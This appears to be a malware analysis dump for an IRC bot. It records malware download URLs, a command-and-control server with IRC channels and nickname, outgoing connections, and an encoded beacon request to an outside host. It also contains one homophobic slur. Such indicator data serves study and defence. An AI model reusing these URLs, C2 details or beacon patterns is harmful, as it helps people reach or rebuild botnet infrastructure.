Resolved : [tux.shannen.cc] To [92.242.140.30]
tux.shannen.cc 92.243.24.240
0 127.0.0.1
onlinewebdll.com
onlinewebdll.com 66.197.218.184
mkm-libya.com
mkm-libya.com 41.254.33.54
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1034
Send Datagram: 131 packet(s) of size 1
Recv Datagram: 131 packet(s) of size 1
Download URLs
http://66.197.218.184/install.48691.exe (onlinewebdll.com)
http://41.254.33.54/install.48755.exe (mkm-libya.com)
C&C Server: 92.243.24.240:5900
Server Password:
Username: VirUs
Nickname: {NOVA}[DEU][XP-SP3]715708
JOIN ##Turb0-37##
Channel: ##Turb0-38## (Password: )
Channeltopic:
Outgoing connection to remote server: onlinewebdll.com TCP port 80
Outgoing connection to remote server: mkm-libya.com TCP port 80DNS Lookup
Host Name IP Address
cnet.com 64.30.224.118
sogou.com 61.135.188.225
Here downloaders used by that fagot:
210207da0831.gabspan.net
210207da0831.gabspan.net: type A, class IN, addr 202.150.208.66
210207da0832.aginder.net: type A, class IN, addr 202.150.208.66
HTTP:
GET /get2.php?c=TOKCNVIP&d=26606B6739323E372E64636F317E3E3D2121232226263078747D456E7579232D10474010101012015D404E16681B1D1E03777305750C01740C097F0E7E0A0F090677047477007303700F090E6A2F27212634206E65626E7130303E663D396A6B575706024204020A55584C041F1B0B1D4D442D42522A021413444A4B4C4F4649B9B5B2B6A2F5F4E8EBB4CFF3FCE1E1FDF5E3BCD6CCD0B0FBFCA8C5FEA1ACB8FCCCCFD6FCC1989681DF9F9E969C8BC8928197C08E8593D5D9DCD587D3DDD3CD99A9A5A3B7A1F8F7F5F1F9FFFFFEFCFEF8F6949D81 HTTP/1.1
Raw:
.’.?…’..K..E...&Y@…….o….B.R.P.D..S;”:P…....GET /get2.php?c=TOKCNVIP&d=26606B6739323E372E64636F317E3E3D2121232226263078747D456E7579232D10474010101012015D404E16681B1D1E03777305750C01740C097F0E7E0A0F090677047477007303700F090E6A2F27212634206E65626E7130303E663D396A6B575706024204020A55584C041F1B0B1D4D442D42522A021413444A4B4C4F4649B9B5B2B6A2F5F4E8EBB4CFF3FCE1E1FDF5E3BCD6CCD0B0FBFCA8C5FEA1ACB8FCCCCFD6FCC1989681DF9F9E969C8BC8928197C08E8593D5D9DCD587D3DDD3CD99A9A5A3B7A1F8F7F5F1F9FFFFFEFCFEF8F6949D81 HTTP/1.1..User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)..Host: 210207da0830.gabspan.net..Cache-Control: no-cache....